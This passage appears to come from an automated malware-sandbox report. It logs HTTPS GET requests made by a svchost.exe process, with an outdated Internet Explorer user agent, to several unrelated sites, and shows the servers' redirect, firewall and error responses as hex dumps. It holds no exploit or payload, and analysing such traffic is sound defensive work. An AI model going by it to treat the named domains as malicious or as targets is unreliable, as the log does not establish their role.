                                                                                                                                                                                                                                                        2023-10-09 13:52:18 UTC8483INData Raw: 32 35 33 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20
                                                                                                                                                                                                                                                        Data Ascii: 253<html><head><title>500 Internal Server Error</title></head><body bgcolor="white"><center><h1>500 Internal Server Error</h1></center><hr><center>nginx/1.12.2</center></body></html>... a padding to disable MSIE and Chrome friendly error
                                                                                                                                                                                                                                                        2023-10-09 13:52:18 UTC8483INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                        37192.168.2.35936394.130.146.206443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                        2023-10-09 13:52:26 UTC8483OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Host: diamir.de
                                                                                                                                                                                                                                                        2023-10-09 13:52:27 UTC8483INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Mon, 09 Oct 2023 13:52:26 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Content-Length: 162
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Location: https://www.diamir.de/
                                                                                                                                                                                                                                                        2023-10-09 13:52:27 UTC8484INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                        38192.168.2.359493104.21.52.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                        2023-10-09 13:52:27 UTC8484OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Host: hyab.se
                                                                                                                                                                                                                                                        2023-10-09 13:52:27 UTC8484INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                        Date: Mon, 09 Oct 2023 13:52:27 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        Content-Length: 5723
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                        Cross-Origin-Resource-Policy: same-origin
                                                                                                                                                                                                                                                        Origin-Agent-Cluster: ?1
                                                                                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                        cf-mitigated: challenge
                                                                                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6z9oB6FDn4Je8HAvprexBlZY%2B0jBGpvCTuBj2DJ%2B0HJrQ4ehx%2BaueDXuB2Q3qdN4y4IW0qqUjuswb5XvFqM0olIIv3eNIUR7NOkjZvAqb0BfKz0uI86fE037"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                        CF-RAY: 81371aace9dc2aec-LAX
                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        2023-10-09 13:52:27 UTC8485INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69
                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compati
                                                                                                                                                                                                                                                        2023-10-09 13:52:27 UTC8485INData Raw: 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 33 35 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73
                                                                                                                                                                                                                                                        Data Ascii: ble" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewport" content="width=device-width,initial-scale=1"><link href="/cdn-cgi/styles/challenges.css" rel="stylesheet"><meta http-equiv="refresh" content="35"></head><body clas
                                                                                                                                                                                                                                                        2023-10-09 13:52:27 UTC8487INData Raw: 78 31 4e 62 68 48 37 59 6b 77 4a 76 46 61 6e 73 5a 47 48 4d 55 6c 59 44 58 62 4b 63 4d 59 33 5a 73 30 51 4a 58 4f 55 70 70 42 73 4c 50 47 70 57 4b 76 35 67 6b 6f 61 56 53 77 67 6b 56 4b 78 4f 45 55 56 50 4e 30 73 63 78 5f 47 77 34 6a 73 4c 69 6c 4c 57 39 37 51 79 44 6c 4f 53 38 2d 64 71 51 6b 62 68 2d 70 31 39 41 63 34 4c 71 55 77 42 57 57 46 62 6b 65 72 2d 49 55 44 45 65 74 74 63 4f 2d 32 67 57 6d 65 4b 50 55 31 7a 72 6e 6a 4e 46 4c 32 56 33 50 59 54 51 2d 30 30 48 45 70 69 74 78 61 4d 4c 4a 63 30 31 5f 54 30 36 50 79 6f 69 76 4d 74 39 62 32 67 61 5f 46 4d 4c 4b 6c 57 30 58 55 4c 73 37 4a 5a 4e 45 6f 5a 6c 53 31 35 6a 46 4c 45 57 4f 46 38 49 31 65 38 6d 5f 41 43 56 46 48 78 6d 48 42 41 38 79 30 34 78 49 49 74 70 54 48 56 39 58 6b 6d 56 67 73 31 73 34 47
                                                                                                                                                                                                                                                        Data Ascii: x1NbhH7YkwJvFansZGHMUlYDXbKcMY3Zs0QJXOUppBsLPGpWKv5gkoaVSwgkVKxOEUVPN0scx_Gw4jsLilLW97QyDlOS8-dqQkbh-p19Ac4LqUwBWWFbker-IUDEettcO-2gWmeKPU1zrnjNFL2V3PYTQ-00HEpitxaMLJc01_T06PyoivMt9b2ga_FMLKlW0XULs7JZNEoZlS15jFLEWOF8I1e8m_ACVFHxmHBA8y04xIItpTHV9XkmVgs1s4G
                                                                                                                                                                                                                                                        2023-10-09 13:52:27 UTC8488INData Raw: 58 70 76 37 32 61 6a 78 4d 52 47 50 64 74 38 58 4d 41 6d 65 35 67 5f 7a 39 37 61 4c 4a 34 66 6a 31 6f 65 31 4f 4a 57 6c 5f 69 70 78 41 42 75 54 61 6a 39 35 47 41 64 58 6c 49 4a 71 43 59 50 4f 6d 56 49 64 6e 42 45 46 6a 43 59 65 79 2d 4c 54 30 31 67 35 53 75 79 48 4c 5a 36 72 42 36 53 45 6b 57 31 4b 52 6e 7a 6d 2d 44 4b 5a 52 4a 44 54 70 47 64 41 4a 4c 58 78 70 49 6c 33 38 31 7a 43 54 32 43 4b 66 4f 71 5f 59 6d 74 71 64 32 31 6f 79 37 54 2d 41 56 50 39 47 5f 67 56 58 72 72 33 37 33 36 6b 71 69 2d 6b 4a 42 71 65 54 6b 54 38 53 6f 4c 62 47 54 57 34 56 37 5a 74 32 78 45 71 52 4e 42 45 34 6f 31 41 4a 52 6e 6b 75 31 68 71 70 43 34 42 57 41 6e 39 6e 54 36 76 6b 32 59 39 35 57 5a 78 73 71 38 6f 79 69 5f 78 66 48 33 64 38 5f 33 54 72 52 36 36 78 5f 74 62 5a 59 55
                                                                                                                                                                                                                                                        Data Ascii: Xpv72ajxMRGPdt8XMAme5g_z97aLJ4fj1oe1OJWl_ipxABuTaj95GAdXlIJqCYPOmVIdnBEFjCYey-LT01g5SuyHLZ6rB6SEkW1KRnzm-DKZRJDTpGdAJLXxpIl381zCT2CKfOq_Ymtqd21oy7T-AVP9G_gVXrr3736kqi-kJBqeTkT8SoLbGTW4V7Zt2xEqRNBE4o1AJRnku1hqpC4BWAn9nT6vk2Y95WZxsq8oyi_xfH3d8_3TrR66x_tbZYU
                                                                                                                                                                                                                                                        2023-10-09 13:52:27 UTC8489INData Raw: 4b 39 69 58 30 63 41 4e 48 6b 4b 4d 37 4b 37 67 56 6a 6d 32 4c 73 39 4c 4c 77 43 4d 4b 30 73 69 70 47 6e 48 54 44 65 70 43 39 79 5a 71 45 64 4b 54 6d 2b 68 4a 42 67 57 34 51 53 50 33 38 36 41 6d 32 66 59 44 58 67 34 48 42 49 4b 39 4d 68 45 35 30 39 2f 52 6b 39 42 78 57 33 58 58 54 4d 4c 54 42 38 59 65 59 31 58 46 55 43 72 50 39 35 36 50 30 35 67 35 36 4b 32 67 52 65 77 64 43 55 33 4e 78 47 44 76 68 67 5a 74 57 73 61 4e 4d 32 6f 32 6f 56 69 46 54 6e 4f 51 4b 6f 30 57 34 6f 73 72 71 75 77 56 66 59 49 6d 43 6c 6f 50 73 59 4e 34 48 79 6b 44 4d 6d 72 69 31 73 49 56 67 6c 70 75 73 58 32 62 59 64 71 47 55 38 62 77 48 4d 66 6e 4e 72 72 4c 62 77 52 52 71 59 6f 39 53 70 6d 31 70 35 77 51 42 6d 6e 42 50 47 30 6e 53 54 41 49 37 67 3d 27 2c 74 3a 20 27 4d 54 59 35 4e
                                                                                                                                                                                                                                                        Data Ascii: K9iX0cANHkKM7K7gVjm2Ls9LLwCMK0sipGnHTDepC9yZqEdKTm+hJBgW4QSP386Am2fYDXg4HBIK9MhE509/Rk9BxW3XXTMLTB8YeY1XFUCrP956P05g56K2gRewdCU3NxGDvhgZtWsaNM2o2oViFTnOQKo0W4osrquwVfYImCloPsYN4HykDMmri1sIVglpusX2bYdqGU8bwHMfnNrrLbwRRqYo9Spm1p5wQBmnBPG0nSTAI7g=',t: 'MTY5N
                                                                                                                                                                                                                                                        2023-10-09 13:52:27 UTC8491INData Raw: 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 63 70 6f 29 3b 7d 28 29 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                        Data Ascii: t.getElementsByTagName('head')[0].appendChild(cpo);}());</script></body></html>


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                        39192.168.2.35949575.2.95.235443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                        2023-10-09 13:52:27 UTC8484OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Host: ldh.la.gov
                                                                                                                                                                                                                                                        2023-10-09 13:52:27 UTC8491INHTTP/1.1 406 Not Acceptable
                                                                                                                                                                                                                                                        Date: Mon, 09 Oct 2023 13:52:27 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Content-Length: 1346
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                        2023-10-09 13:52:27 UTC8491INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 36 20 2d 20 43 6c 69
                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>406 - Cli


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                        4192.168.2.350053185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                        2023-10-09 13:50:56 UTC10OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Host: techtrans.de
                                                                                                                                                                                                                                                        2023-10-09 13:50:56 UTC26INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                        Date: Mon, 09 Oct 2023 13:50:56 GMT
                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                        Content-Security-Policy: report-uri https://techtrans.de
                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                        Permissions-Policy: accelerometer=(), autoplay=(), camera=(), fullscreen=*, geolocation=(self), gyroscope=(), microphone=(), payment=*
                                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET,PUT,POST,DELETE
                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                                                                                                        X-Content-Security-Policy: img-src *; media-src * data:;
                                                                                                                                                                                                                                                        X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        2023-10-09 13:50:56 UTC27INData Raw: 32 63 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 27 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 3c 2f 68 65 61 64 3e 3c 62
                                                                                                                                                                                                                                                        Data Ascii: 2c6<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head><b


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                        40192.168.2.360304172.67.164.178443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                        2023-10-09 13:52:28 UTC8492OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Host: clinicasanluis.com.co
                                                                                                                                                                                                                                                        2023-10-09 13:52:28 UTC8493INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                        Date: Mon, 09 Oct 2023 13:52:28 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        location: https://www.clinicasanluis.com.co/
                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        x-turbo-charged-by: LiteSpeed
                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IQqDDxyIpGhIJTY%2Fv%2FmdhaRdYj5LWmRQa2cZWb1ovyQ6gf87WXvN%2BnazivXP6wnnoStZVT6GZmlcU3mW2M%2BmZOQIDyOrptNvGzibZ02VqZ3%2BQOynWWx70dp9QNd6AsQvPKRR1anKALc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                        CF-RAY: 81371ab0981708c3-LAX
                                                                                                                                                                                                                                                        2023-10-09 13:52:28 UTC8494INData Raw: 32 63 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c
                                                                                                                                                                                                                                                        Data Ascii: 2c3<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial,
                                                                                                                                                                                                                                                        2023-10-09 13:52:28 UTC8494INData Raw: 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: html>
                                                                                                                                                                                                                                                        2023-10-09 13:52:28 UTC8494INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                        41192.168.2.360295185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                        2023-10-09 13:52:28 UTC8493OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Host: techtrans.de
                                                                                                                                                                                                                                                        2023-10-09 13:52:28 UTC8494INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                        Date: Mon, 09 Oct 2023 13:52:28 GMT
                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                        Content-Security-Policy: report-uri https://techtrans.de
                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                        Permissions-Policy: accelerometer=(), autoplay=(), camera=(), fullscreen=*, geolocation=(self), gyroscope=(), microphone=(), payment=*
                                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET,PUT,POST,DELETE
                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                                                                                                        X-Content-Security-Policy: img-src *; media-src * data:;
                                                                                                                                                                                                                                                        X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        2023-10-09 13:52:28 UTC8495INData Raw: 32 63 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 27 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 3c 2f 68 65 61 64 3e 3c 62
                                                                                                                                                                                                                                                        Data Ascii: 2c6<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head><b


